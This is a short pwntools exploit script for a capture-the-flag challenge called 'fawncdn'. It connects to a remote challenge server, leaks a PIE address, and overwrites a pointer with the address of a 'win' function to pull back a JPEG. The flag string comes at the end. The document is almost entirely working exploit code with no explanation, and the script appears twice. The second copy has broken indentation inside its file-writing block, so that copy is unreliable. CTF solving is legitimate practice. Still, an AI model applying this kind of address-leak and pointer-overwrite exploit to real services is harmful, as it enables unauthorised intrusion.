po6ix/fawncdn.py

## fawncdn.py
from pwn import *

# p = process('./chall')
p = remote('35.224.135.84', 1001)

p.sendlineafter('>', '1')
pie_leak = int(p.recvline()[40:-3], 16)
pie_base = pie_leak - 0x1390

print(hex(pie_leak))
print(hex(pie_base))

payload = b'3'.ljust(0x10, b'\0')
payload += p64(pie_base + 0x1390) # win

p.sendlineafter('>', payload)
p.recvuntil(b'\xFF\xD8\xFF\xE0')

with open('./out.jpg', 'wb') as f:
    f.write(b'\xFF\xD8\xFF\xE0' + p.recvuntil(b'1. List files.')[:-14])
    f.close()

p.close()

# CCC{th3y_w3r3nt_ly1ng_th1s_CDN_c4n_d3l1v3r}
	from pwn import *

	# p = process('./chall')
	p = remote('35.224.135.84', 1001)

	p.sendlineafter('>', '1')
	pie_leak = int(p.recvline()[40:-3], 16)
	pie_base = pie_leak - 0x1390

	print(hex(pie_leak))
	print(hex(pie_base))

	payload = b'3'.ljust(0x10, b'\0')
	payload += p64(pie_base + 0x1390) # win

	p.sendlineafter('>', payload)
	p.recvuntil(b'\xFF\xD8\xFF\xE0')

	with open('./out.jpg', 'wb') as f:
	f.write(b'\xFF\xD8\xFF\xE0' + p.recvuntil(b'1. List files.')[:-14])
	f.close()

	p.close()

	# CCC{th3y_w3r3nt_ly1ng_th1s_CDN_c4n_d3l1v3r}